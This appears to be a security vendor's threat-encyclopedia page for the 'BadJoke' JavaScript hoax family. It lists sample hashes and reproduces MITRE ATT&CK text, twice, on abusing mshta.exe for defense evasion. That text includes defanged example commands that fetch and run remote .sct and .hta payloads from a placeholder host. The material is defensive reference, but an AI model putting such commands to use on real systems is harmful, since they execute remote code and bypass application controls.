Update Date
01/05/2024

Class: Hoax

A hoax is a fake warning about a virus or other piece of malicious code. Typically a hoax takes the form of an e-mail message warning the reader of a dangerous new virus and suggesting that the reader pass the message on. Hoaxes cause no damage in themselves, but their distribution by well-meaning users often causes fear and uncertainty. Most anti-virus vendors include hoax information on their web sites and it is always advisable to check before forwarding warning messages.

Read more

Platform: JS

JavaScript (JS) is a prototype-based programming language. JavaScript has traditionally been implemented as an interpreted language. The most common use is in web browsers, where it is used for scripting to add interactivity to web pages.

Family: BadJoke

No family description

Examples

4CF7015638B2FD8C52D2BB1D60D51720
F11C8FCDC196FBDB967D6C1EC135A700
6141D93147CF2777971FF96AC8686262
80E5B731ED44283332B3F57D35B3B440
3F7850E1FB68AE6968E90A563169DEC1

Tactics and Techniques: Mitre*

TA0005
Defense Evasion

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)


Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)


Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))


They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta


Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer’s security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)


T1218.005
System Binary Proxy Execution: Mshta

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)


Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)


Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))


They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta


Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer’s security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)


* © 2024 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.

Kaspersky Next
Let’s go Next: redefine your business’s cybersecurity
Learn more
New Kaspersky!
Your digital life deserves complete protection!
Learn more
Confirm changes?
Your message has been sent successfully.